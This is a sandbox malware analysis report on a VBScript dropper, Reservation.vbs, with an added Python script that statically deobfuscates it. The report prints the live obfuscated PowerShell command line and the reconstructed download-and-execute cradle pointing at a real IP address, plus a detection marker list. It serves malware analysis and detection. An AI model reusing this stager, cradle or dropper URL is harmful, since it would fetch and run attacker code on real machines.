Analysis

Max time kernel: 137s
Max time network: 139s
Platform: windows7_x64
Resource: win7-en
Submitted: 05-09-2021 21:15

Static task: static1
Behavioral task: behavioral1
  Sample: Reservation.vbs
  Resource: win7-en (windows7_x64)
  0 signatures, 0 seconds
General

Target: Reservation.vbs
Size: 1KB
MD5: d1105a626de00b3a3d248febfe9d2eab
SHA1: f088bdfa3f5d251f325ff4b11b5e680425c25ba2
SHA256: c61844d30e92c490359ae221d04620767e303247345e12de34f8ae43eb1cf26b
SHA512: 11378362541f0656af2bc775cfd4b8e23e9c9a08cd9eb8b35109f3553da2e870a9c376efd3df2039c4c8224c70ba54ff0cad0030751bdfb8641da4f639e0bc16
Score: 10/10
Malware Config

Extracted
Language: ps1 (deobfuscated)
URLs:
  exe.dropper  http://54.184.87.30/bypass.txt
Signatures

Enumerates physical storage devices (1 TTP)
  Sandbox description: attempts to interact with connected storage/optical drive(s); likely ransomware behaviour.
  Caveat: this is a generic drive-enumeration heuristic. Nothing else in this report supports a ransomware verdict; the observed chain is WScript.exe launching a PowerShell download cradle for http://54.184.87.30/bypass.txt, and what that second stage does is not captured here.

Suspicious behavior: EnumeratesProcesses (1 IoC)
  Process: powershell.exe (PID 1736)

Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: powershell.exe (PID 1736), Token: SeDebugPrivilege

Suspicious use of WriteProcessMemory (3 IoCs)
  Source PID  Source process  Target PID  Target process
  2040        WScript.exe     1736        powershell.exe
  2040        WScript.exe     1736        powershell.exe
  2040        WScript.exe     1736        powershell.exe
  Caveat: a parent writing into a child it has just created is expected during process start-up, and the pair here matches the WScript.exe -> powershell.exe launch in the process tree. On its own this is not evidence of injection.
Processes

C:\Windows\System32\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Reservation.vbs"
  Signatures: Suspicious use of WriteProcessMemory

  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (child of WScript.exe, PID 1736)
    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $TRUMP ='http://54XXX184XXX87XXX30/bypassXXXtxt'.Replace('XXX','.');$Shib='24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b=24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b=24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b=26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b';Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))
    Signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken

  Reading the command line: $TRUMP rebuilds the dropper URL by replacing every 'XXX' with '.', and $Shib is a '='-separated list of hex byte values that is split, converted back to characters, joined, and handed to Invoke-Expression. The decoded second stage builds its own strings through chains of .Replace() calls on single-quoted literals, so every value in it can be recovered statically without running PowerShell.
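The following Python script is an added worked example; it is not part of the Triage report and not the sample's own code. It takes the powershell.exe arguments recorded above as its only input and reproduces on paper what the two Invoke-Expression calls would compute: it folds the 'literal'.Replace(a,b) chains the way .NET String.Replace does (ordinal, all occurrences), decodes the $Shib hex list, strips the backtick escapes, and inlines the folded variables to reconstruct the download cradle. The regular expressions, the function names, and the marker list are my assumptions; the hex blob is copied verbatim from the process tree and only split across lines for readability. The one thing it deliberately does not reproduce is the final pipe into a second IEX, which would execute whatever the URL returned.

```python
"""Static deobfuscator for the two-layer PowerShell stager launched by Reservation.vbs.

Added example (not from the sandbox report or the sample). Nothing here touches the
network or executes attacker code: the string folding is done by hand.
"""
import re

# Constructed input: the powershell.exe arguments copied from the report's process tree.
# $Shib is the original hex list; it is only split over several lines for readability.
SHIB_HEX = "=".join([
    # $B  -> nEt.WEbClIeNT
    "24=42=20=3d=27=45=54=48=20=43=4f=49=4e=74=2e=57=54=46=20=43=4f=49=4e=6c=49=4f=53=4e=54=27=2e"
    "=52=65=70=6c=61=63=65=28=27=45=54=48=20=43=4f=49=4e=27=2c=27=6e=45=27=29=2e"
    "=52=65=70=6c=61=63=65=28=27=54=46=20=43=4f=49=4e=27=2c=27=45=62=43=27=29=2e"
    "=52=65=70=6c=61=63=65=28=27=4f=53=27=2c=27=65=27=29=3b",
    # $CC -> DOWnLoaDSTrInG
    "24=43=43=20=3d=20=27=44=4f=53=20=43=4f=49=4e=20=4c=53=4f=53=43=4f=49=4e=6e=47=27=2e"
    "=52=65=70=6c=61=63=65=28=27=53=20=43=4f=49=4e=20=27=2c=27=57=6e=27=29=2e"
    "=52=65=70=6c=61=63=65=28=27=53=4f=27=2c=27=6f=61=44=27=29=2e"
    "=52=65=70=6c=61=63=65=28=27=43=4f=49=4e=27=2c=27=54=72=49=27=29=3b",
    # $A  -> the download cradle, with backtick escapes sprinkled in
    "24=41=20=3d=27=49=60=45=6f=73=20=43=4f=49=4e=60=57=60=42=54=43=20=43=4f=49=4e=6a"
    "=60=45=54=48=20=43=4f=49=4e=20=24=42=29=2e=24=43=43=28=24=54=52=55=4d=50=29=27=2e"
    "=52=65=70=6c=61=63=65=28=27=6f=73=20=43=4f=49=4e=27=2c=27=58=28=6e=60=65=27=29=2e"
    "=52=65=70=6c=61=63=65=28=27=42=54=43=20=43=4f=49=4e=27=2c=27=2d=4f=62=27=29=2e"
    "=52=65=70=6c=61=63=65=28=27=54=48=20=43=4f=49=4e=27=2c=27=60=63=60=54=27=29=3b",
    # &('I'+'EX')($A -Join '')|&('I'+'EX');
    "26=28=27=49=27=2b=27=45=58=27=29=28=24=41=20=2d=4a=6f=69=6e=20=27=27=29=7c=26=28=27=49=27=2b=27=45=58=27=29=3b",
])
STAGE1 = (
    "$TRUMP ='http://54XXX184XXX87XXX30/bypassXXXtxt'.Replace('XXX','.');"
    "$Shib='" + SHIB_HEX + "';"
    "Invoke-Expression (-join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) }))"
)

# $name = 'literal'.Replace('a','b').Replace('c','d')... ;  (single-quoted, so no interpolation)
ASSIGN = re.compile(r"\$(\w+)\s*=\s*'([^']*)'((?:\.Replace\('[^']*','[^']*'\))+)\s*;")
CALL = re.compile(r"\.Replace\('([^']*)','([^']*)'\)")
BAREWORD = re.compile(r"^[\w.\-]+$")


def decode_hex_list(blob, sep="="):
    """Mirror of: -join ($Shib -split '=' | ? { $_ } | % { [char][convert]::ToUInt32($_,16) })."""
    return "".join(chr(int(tok, 16)) for tok in blob.split(sep) if tok)


def fold_replace_chains(script):
    """Evaluate every 'literal'.Replace(...) chain assignment without running PowerShell.
    .NET String.Replace is ordinal and replaces all occurrences, exactly like str.replace."""
    values = {}
    for name, literal, chain in ASSIGN.findall(script):
        for old, new in CALL.findall(chain):
            literal = literal.replace(old, new)
        values[name] = literal
    return values


def resolve(expr, values):
    """Drop backtick escapes (they vanish once IEX parses the string as code) and inline
    the folded variables, quoting any value that is not a bare word."""
    expr = expr.replace("`", "")
    for name, val in sorted(values.items(), key=lambda kv: -len(kv[0])):
        expr = expr.replace("$" + name, val if BAREWORD.match(val) else "'" + val + "'")
    return expr


def deobfuscate(stage1):
    """Return the dropper URL, the decoded second stage and the reconstructed cradle."""
    values = fold_replace_chains(stage1)                       # $TRUMP
    blob = re.search(r"\$Shib='([0-9a-fA-F=]+)'", stage1).group(1)
    stage2 = decode_hex_list(blob)                             # what the first IEX runs
    values.update(fold_replace_chains(stage2))                 # $B, $CC, $A
    return {"url": values["TRUMP"], "stage2": stage2, "command": resolve(values["A"], values)}


CRADLE_MARKERS = ("net.webclient", "downloadstring", "iex", "invoke-expression")


def cradle_markers(command):
    """Case-fold before matching: the recovered cradle is case-mangled (nEt.WEbClIeNT)."""
    low = command.lower()
    return [m for m in CRADLE_MARKERS if m in low]


if __name__ == "__main__":
    out = deobfuscate(STAGE1)
    for key in ("url", "stage2", "command"):
        print(f"{key:8}: {out[key]}")
    print(f"markers : {cradle_markers(out['command'])}")
```

Run as a script it prints the recovered URL (which matches the extracted config above), the decoded second stage, and the cradle IEX(neW-ObjEcT nEt.WEbClIeNT).DOWnLoaDSTrInG('http://54.184.87.30/bypass.txt'). Two points for detection follow from this: string matching on the command line must case-fold, because the .Replace() chains produce mixed-case identifiers that PowerShell resolves case-insensitively, and a rule keyed on the literal 'Invoke-Expression' would miss the second stage, which spells it as &('I'+'EX').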
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

File                                                              Size
memory/1736-54-0x0000000000000000-mapping.dmp
memory/1736-56-0x000007FEF2940000-0x000007FEF349D000-memory.dmp   11.4MB
memory/1736-58-0x0000000002810000-0x0000000002812000-memory.dmp   8KB
memory/1736-59-0x0000000002812000-0x0000000002814000-memory.dmp   8KB
memory/1736-60-0x0000000002814000-0x0000000002817000-memory.dmp   12KB
memory/1736-57-0x000000001B760000-0x000000001BA5F000-memory.dmp   3.0MB
memory/1736-61-0x000000000281B000-0x000000000283A000-memory.dmp   124KB
memory/2040-53-0x000007FEFB651000-0x000007FEFB653000-memory.dmp   8KB